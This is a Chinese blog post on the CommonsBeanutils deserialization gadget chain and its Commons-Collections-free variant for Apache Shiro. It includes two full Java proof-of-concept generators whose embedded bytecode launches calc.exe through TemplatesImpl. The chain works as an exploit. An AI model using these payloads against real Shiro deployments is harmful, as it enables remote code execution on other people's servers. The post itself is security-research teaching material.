cbu和无cc的shiro反序列化

最新推荐文章于 2025-03-30 09:24:44 发布
原创 最新推荐文章于 2025-03-30 09:24:44 发布 · 347 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#python #开发语言 #java #tomcat #hibernate

博客围绕Shiro反序列化展开,介绍了学习CommonsBeanutils的前置知识,阐述了cbu链原理,分析了Shiro反序列化遇到的困难,如本地与远程依赖包版本不一致、Shiro自带cbu类不全导致反序列化失败等问题,还探讨了无CC的Gadget及替换候选类。

前置知识

学习CommonsBeanutils之前应该知道

  1. javaBean,可以看《Java简单特性》也可以看这里
  2. 有关BeanComparator的介绍
  3. TemplatesImpl gadget,前两个方法是public
TemplatesImpl#getOutputProperties() -> TemplatesImpl#newTransformer() -> TemplatesImpl#getTransletInstance() -> TemplatesImpl#defineTransletClasses()
-> TransletClassLoader#defineClass()

cbu链原理

BeanComparator()用于比较两个Java Bean,当property不存在的时候会调用PropertyUtils.getProperty去获取JavaBean的属性,也就是执行getter

恰巧TemplatesImpl#getOutputProperties符合getter的命名规则

Gadget

Gadget chain:
    ObjectInputStream.readObject()
        PriorityQueue.readObject()
            PriorityQueue.heapify()
                PriorityQueue.siftDown()
                    siftDownUsingComparator()
                        BeanComparator.compare()
                            TemplatesImpl.getOutputProperties()
                                TemplatesImpl.newTransformer()
                                    TemplatesImpl.getTransletInstance()
                                        TemplatesImpl.defineTransletClasses()
                                            TemplatesImpl.TransletClassLoader.defineClass()
                                                 Runtime.exec()

Poc

import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.Base64;
import java.util.PriorityQueue;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import javassist.ClassPool;
import org.apache.commons.beanutils.BeanComparator;

public class CommonsBeanutils1 {
    public static void main(String[] args) throws Exception {
        String base64encodedString = Base64.getEncoder().encodeToString(getpayload());
        System.out.println(base64encodedString);
    }

        public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj, value);
    }

    public static byte[] getpayload() throws Exception {
        byte[] code = Base64.getDecoder().decode("yv66vgAAADQANQoACwAaCQAbABwIAB0KAB4AHwoAIAAhCAAiCgAgACMHACQKAAgAJQcAJgcAJwEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAoAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgEADVN0YWNrTWFwVGFibGUHACYHACQBAApTb3VyY2VGaWxlAQAXSGVsbG9UZW1wbGF0ZXNJbXBsLmphdmEMABMAFAcAKQwAKgArAQATSGVsbG8gVGVtcGxhdGVzSW1wbAcALAwALQAuBwAvDAAwADEBAAhjYWxjLmV4ZQwAMgAzAQATamF2YS9pby9JT0V4Y2VwdGlvbgwANAAUAQASSGVsbG9UZW1wbGF0ZXNJbXBsAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAEGphdmEvbGFuZy9TeXN0ZW0BAANvdXQBABVMamF2YS9pby9QcmludFN0cmVhbTsBABNqYXZhL2lvL1ByaW50U3RyZWFtAQAHcHJpbnRsbgEAFShMamF2YS9sYW5nL1N0cmluZzspVgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA9wcmludFN0YWNrVHJhY2UAIQAKAAsAAAAAAAMAAQAMAA0AAgAOAAAAGQAAAAMAAAABsQAAAAEADwAAAAYAAQAAAAsAEAAAAAQAAQARAAEADAASAAIADgAAABkAAAAEAAAAAbEAAAABAA8AAAAGAAEAAAAMABAAAAAEAAEAEQABABMAFAABAA4AAABsAAIAAgAAAB4qtwABsgACEgO2AAS4AAUSBrYAB1enAAhMK7YACbEAAQAMABUAGAAIAAIADwAAAB4ABwAAAA8ABAAQAAwAEgAVABUAGAATABkAFAAdABYAFQAAABAAAv8AGAABBwAWAAEHABcEAAEAGAAAAAIAGQ==");
        TemplatesImpl obj = new TemplatesImpl();
        setFieldValue(obj, "_bytecodes", new byte[][]{code});
        setFieldValue(obj, "_name", "HelloTemplatesImpl");
        setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());

        final BeanComparator comparator = new BeanComparator();
        final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);
        // stub data for replacement later
        queue.add(1);
        queue.add(1);

        setFieldValue(comparator, "property", "outputProperties");
        setFieldValue(queue, "queue", new Object[]{obj, obj});

        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(barr);
        oos.writeObject(queue);
        oos.close();

        //本地触发测试
        System.out.println(barr);
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
        Object o = (Object)ois.readObject();

        return barr.toByteArray();
    }
}

Shiro反序列化遇到的困难

  • 本地生成payload的包和远程依赖的包版本不一导致serialVersionID不一致,反序列化失败

  • Shiro自带CommonsBeanutils,不依赖cc。但是Shiro反序列化需要cc

虽然cbu本身依赖cc,但是Shiro中自带的cbu中的类不全,反序列化会失败

no CC的Gadge

org.apache.commons.collections.comparators.ComparableComparator在BeanComparator类的构造方法里面被用到,要解决没有cc的时候ClassNotFound的问题就需要替换这个ComparableComparator。

因为ComparableComparator实现了Comparator接口,替换候选类需要满足:

  • 实现了java.util.Comparatorjava.io.Serializable接口
  • Java,shiro,cbu里面自带

我们去看Comparator接口,看下哪些类实现了他:

java.lang.String.CaseInsensitiveComparator:

直接通过String.CASE_INSENSITIVE_ORDER就可以获得一个对象

poc

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.beanutils.BeanComparator;

import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.Base64;
import java.util.PriorityQueue;

public class CommonsBeanutils1Shiro {
    public static void main(String[] args) throws Exception {
        String base64encodedString = Base64.getEncoder().encodeToString(getpayload());
        System.out.println(base64encodedString);
    }

    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj, value);
    }

    public static byte[] getpayload() throws Exception {
        byte[] code = Base64.getDecoder().decode("yv66vgAAADQANQoACwAaCQAbABwIAB0KAB4AHwoAIAAhCAAiCgAgACMHACQKAAgAJQcAJgcAJwEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAoAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgEADVN0YWNrTWFwVGFibGUHACYHACQBAApTb3VyY2VGaWxlAQAXSGVsbG9UZW1wbGF0ZXNJbXBsLmphdmEMABMAFAcAKQwAKgArAQATSGVsbG8gVGVtcGxhdGVzSW1wbAcALAwALQAuBwAvDAAwADEBAAhjYWxjLmV4ZQwAMgAzAQATamF2YS9pby9JT0V4Y2VwdGlvbgwANAAUAQASSGVsbG9UZW1wbGF0ZXNJbXBsAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAEGphdmEvbGFuZy9TeXN0ZW0BAANvdXQBABVMamF2YS9pby9QcmludFN0cmVhbTsBABNqYXZhL2lvL1ByaW50U3RyZWFtAQAHcHJpbnRsbgEAFShMamF2YS9sYW5nL1N0cmluZzspVgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA9wcmludFN0YWNrVHJhY2UAIQAKAAsAAAAAAAMAAQAMAA0AAgAOAAAAGQAAAAMAAAABsQAAAAEADwAAAAYAAQAAAAsAEAAAAAQAAQARAAEADAASAAIADgAAABkAAAAEAAAAAbEAAAABAA8AAAAGAAEAAAAMABAAAAAEAAEAEQABABMAFAABAA4AAABsAAIAAgAAAB4qtwABsgACEgO2AAS4AAUSBrYAB1enAAhMK7YACbEAAQAMABUAGAAIAAIADwAAAB4ABwAAAA8ABAAQAAwAEgAVABUAGAATABkAFAAdABYAFQAAABAAAv8AGAABBwAWAAEHABcEAAEAGAAAAAIAGQ==");
        TemplatesImpl obj = new TemplatesImpl();
        setFieldValue(obj, "_bytecodes", new byte[][]{code});
        setFieldValue(obj, "_name", "HelloTemplatesImpl");
        setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());

        final BeanComparator comparator = new BeanComparator(null, String.CASE_INSENSITIVE_ORDER);
        final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);
        // stub data for replacement later
        queue.add("1");
        queue.add("1");

        setFieldValue(comparator, "property", "outputProperties");
        setFieldValue(queue, "queue", new Object[]{obj, obj});

        // 生成序列化字符串
        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(barr);
        oos.writeObject(queue);
        oos.close();

//        //本地触发测试
//        System.out.println(barr);
//        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
//        Object o = (Object)ois.readObject();

        return barr.toByteArray();
    }
}
why811
关注
shiro550反序列化漏洞(一)
ki10Moc的博客
08-01 1112
垃圾文章不要看
[Java反序列化]CommonsBeanutils链与Shiro with noCC
GX233的博客
07-17 743
我们在调用BeanComparator的无参构造方法时,会自行将comparator设置为ComparableComparator的实例,而ComparableComparator是CommonsCollections的类,所以为了避免使用到CommonsCollections的类,我们需要自己设置一个comparator。简单地说,该类在反序列化的时候,会检查队列元素是否符合优先队列的次序,所以会调用到compare,而成员变量的comparator我们可以放入BeanComparator。
shiro反序列化漏洞与无依赖CB链分析
灰太的表格的博客
02-22 1677
shiro反序列化漏洞与无依赖CB链分析
Java反序列化漏洞——CommonsBeanutils1链分析
Thunderclap的博客
02-20 2168
在创建类的对象的时候可以为comparator赋予特定的比较器,值得注意的是如果没有设定自定义的comparator,其默认为ComparableComparator对象,当然,在调用链中,将会调用他的compare方法。接收两个参数 bean (类对象) name(属性名),方法会返回这个类的这个属性的值,但是他不是直接通过反射取值,而是通过反射调用getter方法获取属性,进而经过恶意的构造,我们可以触发任意的getter方法。getter方法以get开头,setter方法以set开头。
Apache Commons项目简介之BeanUtils
NCNC
04-01 6451
                    Apache Commons项目简介之BeanUtils0.简介Apache Commons项目是专注于开发可重用的Java组件。Apache Commons项目由三部分组成:Commons Proper - 可重用Java组件库。Commons Sandbox - Java组件开发工作空间。Commons Dormant - sandbox中不活跃的项目存
RA4M2开发涂鸦模块CBU(6)-RA4M2驱动涂鸦CBU模组
08-09
系统架构由 RA4M2 负责业务逻辑外设驱动,CBU 模组提供网络接入与云端交互能力,两者通过标准串口通协议 (Tuya 通用协议) 完整实现产品功能上报与命令下发。 硬件准备 首先需要准备一个开发板,这里我准备的是自己...
采用涂鸦CBU Wi-Fi & Bluetooth 模组ATMEGA328P制作的多功能报警器+源码+文档说明(高分作品)
12-14
2、本项目适合计算机相关专业(如计科、人工智能、通信工程、自动化、电子信息等)的在校学生、老师或者企业员工下载学习,也适合小白学习进阶,当然也可作为毕设项目、课程设计、作业、项目初期立项演示等。...
自动化绕线机器,用于简化无刷直流电机绕线过程,节省时间人力。.zip
最新发布
10-31
一个专为BLDC无刷直流电机设计的自动化绕线设备。该项目通过多电机协同控制系统,将传统手工绕线工艺转化为全自动流程。核心价值在于显著提升电机绕线效率与一致性,同时降低人工操作强度。系统采用模块化设计,支持...
精选资源
涂鸦智能CBU二次开发指导手册基础版.pdf
07-07
开发环境的搭建是开发的第一步,涂鸦智能 CBU 模块二次开发指导手册基础版提供了详细的指导,包括安装 VMware 虚拟机 ubuntu 操作系统,完成虚拟机上的网络配置工作,以及在 ubuntu 系统中安装 git 工具。...
RA4M2开发涂鸦模块CBU(4)-配置串口
08-09
RA4M2开发涂鸦模块CBU(4)----配置串口 优快云文字教程:https://coremaker.blog.youkuaiyun.com/article/details/148812745 B站教学视频:https://www.bilibili.com/video/BV17BMnz4Enc 概述 printf 是 C 语言中常用的输出...
Shiro反序列化漏洞利用笔记
文公子的博客
12-10 7764
Shiro反序列化漏洞利用笔记 Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码会话管理。目前在Java web应用安全框架中,最热门的产品有Spring SecurityShiro,二者在核心功能上几乎差不多,但Shiro更加轻量级,使用简单、上手更快、学习成本低,所以Shiro的使用量一直高于Spring Security。产品用户量之高,一旦爆发漏洞波及范围相当广泛,研究相关漏洞是很有必要的。 一、Shiro反序列化漏洞 1.1 安全框架 Apache Sh
JAVA反序列化深入学习(十):CommonsBeanutils1
Neolock的博客
03-30 1246
由 TransformingComparator 触发 ChainedTransformer ,从而实例化 TemplatesImpl 那能不能找到一个 Comparator,绕过中间复杂过程,直接实例化 TemplatesImpl 呢? 于是有了 CommonsBeanutils 这条链
shiro反序列化
qq_64201116的博客
03-11 1278
shiro反序列化超完整超细节
CommonsBeanutils
Christ1na的博客
10-14 4123
Apache Commons Beanutils 是 Apache Commons 工具集下的另一个项目,它提供了对普通Java类对象(也称为JavaBean)的一些操作方法。 梳理一下流程,首先反序列化入口PriorityQueue类中我们可以调用任意对象的compare方法,而我们要调用的这个compare方法中,最终要调用至PropertyUtils.getProperty方法,进而调用TemplatesImpl利用链。
Shiro安全(三):Shiro自身利用链之CommonsBeanutils
weixin_43263451的博客
08-05 3185
前面在利用shiro反序列化时,都是利用CC链,但是这需要服务端引入CommonsCollections组件。所以最好是找到一条shiro自身的利用链,而不需要任何的前提条件在之前曾介绍过,在反序列化这个对象时,为了保证队列顺序,会进行重排序的操作,而排序就涉 及到大小比较,进而执行 java.util.Comparator 接口的 compare() 方法。是否能够找到其他的Comparator呢本文主要是要理解如何在没有CC组件等外部依赖的情况下,找到shiro自身的利用链来提高攻击的成功率。...
Shiro无依赖链—Commons Beanutils
Le1a's Blog
03-23 7803
Shiro无依赖链—Commons Beanutils 文章首发自: https://www.le1a.com/posts/a5f4a9e3/ 前言 前面学习了CC6在Shiro当中的应用,但是很多场景没有使用CC依赖,那么还有其他利用方式吗?那就是Commons Beanutils! Commons Beanutils是什么? Commons-Beanutils是Apache提供的一个用于操作JAVA bean的工具包。里面提供了各种各样的工具类,让我们可以很方便的对bean对象的属性进行各种操作。 Ja
Springboot+shiro里的未授权链接无作用
程序猿日记本
11-23 5291
springboot+shrio中的坑
java--CommonsBeanutils1 学习
zyer
06-07 512
CommonsBeanutils1利用链学习
shiro defaultkey无利用_深入利用Shiro反序列化漏洞
weixin_35734296的博客
01-06 3201
0x00:背景shiro反序列化RCE是在实战中一个比较高频且舒适的漏洞,shiro框架在java web登录认证中广泛应用,每一次目标较多的情况下几乎都可以遇见shiro,而因其payload本身就是加密的,无攻击特征,所以几乎不会被waf检测拦截。0x01:shiro反序列化的原理先来看看shiro在1.2.4版本反序列化的原理这里是shiro拿到cookie后的关键代码,先dec...
CBU幻彩模块esp32开发板连接
03-21
### CBU幻彩模块与ESP32开发板的连接方法 CBU幻彩模块是一种用于控制LED灯带的专用硬件设备,其设计目的是简化复杂的灯光效果实现过程。当将其与ESP32开发板结合时,可以利用ESP32的强大处理能力网络功能来增强系统的可扩展性灵活性。 #### 连接方式概述 为了将CBU幻彩模块与ESP32开发板成功连接并运行,需注意以下几个方面: 1. **电源管理** - ESP32通常工作在3.3V电压下,而CBU幻彩模块可能需要更高的驱动电压(如5V)。因此,在连接两者之前,应确认供电需求的一致性,并考虑使用稳压电路或电平转换器以保护器件免受过压损坏[^1]。 2. **信号线对接** - 数据通信一般通过UART串口完成。具体来说,ESP32的一个TX引脚会连接到CBU模组的RX接口上;同样地,ESP32的某个RX引脚则对应于CBU模组上的TX端子。这种配置允许双向数据交换以便发送命令接收反馈状态信息。 3. **接地共通(GND)** - 确保两者的GND针脚相连非常重要,这一步骤确保了电气参考点相同,对于稳定可靠的通讯至关重要。 4. **软件编程支持** 下面提供了一个简单的Arduino IDE环境下的代码片段作为示例展示如何初始化串行通信并向CBU发出基本指令: ```cpp #include <HardwareSerial.h> // 创建一个新的硬件序列对象实例, 使用指定GPIOs (这里假设为 GPIO16 GPIO17) HardwareSerial mySerial(2); void setup() { Serial.begin(9600); // 初始化额外的serial port at baud rate of 115200bps. mySerial.begin(115200, SERIAL_8N1, 16, 17); } void loop() { String command = "SET_COLOR_RED"; if(mySerial.available()){ char incomingByte = mySerial.read(); Serial.print("Received: "); Serial.println(incomingByte); } delay(1000); mySerial.write(command.c_str()); } ``` 此程序段定义了一条消息`SET_COLOR_RED`, 它会被周期性的传送给CBU控制器去改变关联灯具的颜色属性. --- #### 注意事项 - 验证所选波特率是否匹配双方默认设置或者自定义调整后的数值。 - 如果遇到任何干扰问题尝试增加拉电阻提高抗噪性能。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值